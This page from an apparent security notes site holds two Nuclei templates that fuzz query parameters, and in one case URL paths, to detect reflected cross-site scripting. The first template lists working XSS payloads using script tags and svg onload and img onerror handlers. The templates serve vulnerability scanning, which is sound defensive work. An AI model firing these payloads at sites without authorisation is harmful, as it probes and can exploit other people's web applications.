Template

my-reflected-xss.yaml

id: reflected-xss-fuzz

info:
  name: Reflected XSS Fuzz
  author: ASAD
  severity: medium
  description: Attempts to detect reflected XSS via fuzzing all query parameters
  tags: xss,fuzzing,dast

http:
  - payloads:
      xss:
        - "<script>alert(1)</script>"
        - "'\"><svg/onload=alert(1)>"
        - "'\">';/><u>test123"
        - "\">';/></script><u>test123"
        - "\">';/></textarea><u>test123"
        - "\">K='><Svg/OnLoad=(confirm)(origin)>"
        - "'\"/><Img Src=OnXSS OnError=(alert)(1)>"

    fuzzing:
      - part: query
        mode: single
        fuzz:
          - "{{xss}}"

    matchers-condition: and

    matchers:
      - type: word
        part: body
        words:
          - "{{xss}}"

      - type: status
        status:
          - 200

reflected-xss.yaml

id: reflected-xss

info:
  name: Reflected Cross-Site Scripting
  author: pdteam,0xKayala,AmirHossein Raeisi
  severity: medium
  metadata:
    max-request: 1
  tags: xss,rxss,dast

variables:
  first: "{{rand_int(10000, 99999)}}"

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      reflection:
        - "'\"><{{first}}>"
        - "'><{{first}}>"
        - "\"><{{first}}>"

    fuzzing:
      - part: query
        type: postfix
        mode: single
        fuzz:
          - "{{reflection}}"

      - part: path
        type: postfix
        mode: single
        fuzz:
          - "{{reflection}}"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{reflection}}"

      - type: word
        part: header
        words:
          - "text/html"
# digest: 4a0a00473045022100b946e6f2777bc795532ee437c3d501e3a0dda1c5bb31838576a7ae90d9862af102203bce6702443ca30f8c1fd96869c24c442f0d920e8b2db0bab68413c30b9756c9:922c64590222798bb761d5b6d8e72950

PreviousAccount-takeover NextSSTI Injection POC

Last updated 1 month ago